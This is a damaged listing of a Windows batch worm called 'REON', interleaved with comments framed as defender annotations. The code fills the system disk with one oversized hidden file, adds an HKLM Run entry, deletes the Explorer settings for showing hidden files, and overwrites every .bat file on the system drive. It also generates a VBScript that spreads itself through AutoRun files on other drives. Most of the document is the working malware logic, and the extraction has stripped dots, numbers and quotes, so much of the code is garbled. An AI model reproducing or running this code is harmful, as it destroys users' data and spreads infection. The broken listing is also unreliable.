@echo off
:: Analysis notes: batch dropper with worm-like spreading, annotated for defenders.
:: Behaviours visible in this listing: disk-space exhaustion through one oversized
:: file, logon persistence through an HKLM Run value, hiding of its own files,
:: overwriting of batch files on the system drive, and a generated VBScript that
:: plants an AutoRun file on other drives.
:: NOTE(review): the listing looks damaged by extraction - file names carry no dot
:: and numeric literals and quotes are absent - so every token is documented as it
:: appears here, and intent is taken from the author's own trailing notes.
:: The banner that follows is written as expansions of the ozone variable, which is
:: never set in this listing; presumably the lines are meant to expand to nothing.
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
%ozone% %Name :REON% %ozone%
%ozone% %Author:Ozone []% %ozone%
%ozone% %Data ://% %ozone%
%ozone%^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^%ozone%
:: Guard, as apparently intended: jump to the end label when the marker file
:: PAGEFILESSYS already sits at the root of the system drive.
if exsit %SystemDrive%\PAGEFILESSYS goto end
:: Author's trailing note: copy itself. The target is logonbat in the system
:: folder under windir; the source operand is damaged in this listing.
copy % %windir%\system\logonbat ::復制自身
:: Author's trailing note: create an oversized file to flood the disk.
:: The loop filters a dir listing of the system drive for the free-bytes line and
:: hands the result to fsutil file createnew as the size of PAGEFILESSYS.
:: Detection: fsutil file createnew started from a script, followed by free space
:: on the system volume dropping sharply.
FOR /F tokens=* %%i in (dir /c %SystemDrive%^|find 可用字節) do fsutil file createnew %SystemDrive%\PAGEFILESSYS %%i ::制造超大文件轟炸硬盤
:: Author's trailing note: hide the file. Sets the read-only, system and hidden
:: attributes. The name appears chosen to resemble the Windows page file, so a
:: root-level file of this name deserves a check against the configured pagefile.
attrib +r +s +h %SystemDrive%\PAGEFILESSYS ::隱藏文件
:: Author's trailing note: autostart. Persistence through value KV of type REG_SZ
:: under the HKLM CurrentVersion\Run key, pointing at logonvbs in the system folder.
:: Detection: audit writes to this Run key and review autostart entries whose data
:: points at a script.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v KV /t REG_SZ /d %windir%\system\logonvbs ::自動啟動
:: Author's trailing note: do not show hidden files. Removes all values (/va) under
:: the Explorer SHOWALL key without prompting (/f). An empty SHOWALL key on a host
:: is a useful hunting signal.
reg delete HKLM\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /va /f ::不顯示隱藏文件
:: Author's trailing note: infect. Walks the system drive recursively and redirects
:: output into every file matched by the pattern, replacing its content.
:: Recovery means restoring the affected scripts from a known-good backup.
for /r %SystemDrive% %%i in (*bat) do type %>%%i ::感染
:: Skip regenerating the VBScript when logonvbs is already present.
if exist %windir%\system\logonvbs goto end
+++++++++++++++++++++++++=VBS部分+++++++++++++++++++++++++++++++++++++++
:: The separator above reads: VBS part. From here each echo appends one line of
:: VBScript text to logonvbs, the file registered under the Run key earlier.
:: The first emitted lines create a file-system object and a shell object, open a
:: WMI connection and query the logical disks.
echo set fs =createobject(scriptingfilesystemobject)>>%windir%\system\logonvbs
echo set WshShell = WScriptCreateObject(WScriptShell)>>%windir%\system\logonvbs
echo Set objWMIService = GetObject(winmgmts: _>>%windir%\system\logonvbs
echo ^& {impersonationLevel=impersonate}!\\ ^& strComputer ^& \root\cimv)>>%windir%\system\logonvbs
echo Set colDisks = objWMIServiceExecQuery _>>%windir%\system\logonvbs
echo (Select * from Win_LogicalDisk)>>%windir%\system\logonvbs
:: Watch for USB drives
:: The emitted lines open an outer counted loop, iterate the queried disks and
:: branch on each disk's drive type; loop bounds and the case value are missing
:: from this listing.
echo For i = to >>%windir%\system\logonvbs
echo For Each objDisk in colDisks>>%windir%\system\logonvbs
echo Select Case objDiskDriveType>>%windir%\system\logonvbs
echo :Case :>>%windir%\system\logonvbs
:: Check whether autoruninf exists on the USB drive; if not, write autoruninf and hide it
:: The written AutoRun section names logonbat in its open, shellexecute and shell
:: command entries. Defence: disable AutoRun for removable media by policy
:: (NoDriveTypeAutoRun) and treat a hidden AutoRun file at a drive root that names
:: a script as an indicator.
echo y=fsFileExists(objDiskDeviceID ^& \AUTORUNINF)>>%windir%\system\logonvbs
echo if not y then>>%windir%\system\logonvbs
echo set f=fsopentextfile(objDiskDeviceID ^& \AUTORUNINF true)>>%windir%\system\logonvbs
echo fwrite [AutoRun] ^& vbcrlf>>%windir%\system\logonvbs
echo fwrite open=logonbat ^& vbcrlf>>%windir%\system\logonvbs
echo fwrite shellexecute=logonbat ^& vbcrlf>>%windir%\system\logonvbs
echo fwrite shell\Auto\command=logonbat ^& vbcrlf>>%windir%\system\logonvbs
echo fClose>>%windir%\system\logonvbs
:: The next emitted lines fetch the file just written and adjust its attributes;
:: the mask values are missing here, and the author's note says the file is hidden.
echo Set f = fsGetFile(objDiskDeviceID ^& \AUTORUNINF)>>%windir%\system\logonvbs
echo If fAttributes = fAttributes AND Then>>%windir%\system\logonvbs
echo :fAttributes = fAttributes XOR :>>%windir%\system\logonvbs
echo End If>>%windir%\system\logonvbs
echo end if>>%windir%\system\logonvbs
:: Check whether logonbat exists on the USB drive; if not, write logonbat and hide it
:: The emitted copy uses a fixed c:\windows\system source path rather than windir.
echo y=fsFileExists(objDiskDeviceID ^& \logonbat)>>%windir%\system\logonvbs
echo if not y then >>%windir%\system\logonvbs
echo fsCopyFile c:\windows\system\logonbatobjDiskDeviceID ^& \>>%windir%\system\logonvbs
echo Set f = fsGetFile(objDiskDeviceID ^& \logonbat)>>%windir%\system\logonvbs
echo If fAttributes = fAttributes AND Then>>%windir%\system\logonvbs
echo :fAttributes = fAttributes XOR :>>%windir%\system\logonvbs
echo End If>>%windir%\system\logonvbs
echo end if>>%windir%\system\logonvbs
:: The emitted line stores the expanded system drive in dirr for the check below.
echo dirr = WshshellExpandEnvironmentStrings(%systemdrive%)>>%windir%\system\logonvbs
:: Check whether PAGEFILESSYS exists on the USB drive; if not, write PAGEFILESSYS and hide it
:: NOTE(review): the emitted test is built from dirr, the system drive, not from
:: the removable drive the author's note mentions. When the file is missing the
:: script runs logonbat again, so deleting PAGEFILESSYS alone does not clean a
:: host while the Run value and logonvbs remain.
echo y=fsFileExists(dirr & \PAGEFILESSYS)>>%windir%\system\logonvbs
echo if not y then>>%windir%\system\logonvbs
echo WshShellRun logonbat>>%windir%\system\logonvbs
echo WScriptSleep >>%windir%\system\logonvbs
echo Set f = fsGetFile(dirr & \PAGEFILESSYS)>>%windir%\system\logonvbs
echo If fAttributes = fAttributes AND Then>>%windir%\system\logonvbs
echo :fAttributes = fAttributes XOR :>>%windir%\system\logonvbs
echo End If>>%windir%\system\logonvbs
echo end if>>%windir%\system\logonvbs
echo End Select>>%windir%\system\logonvbs
echo Next>>%windir%\system\logonvbs
:: Scan once every N seconds (the number is missing from this listing)
echo WScriptSleep >>%windir%\system\logonvbs
echo Next>>%windir%\system\logonvbs
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
:: Jump target of the two goto end statements above; nothing runs after it.
:end
From:http://tw.wingwit.com/Article/program/qrs/201404/30411.html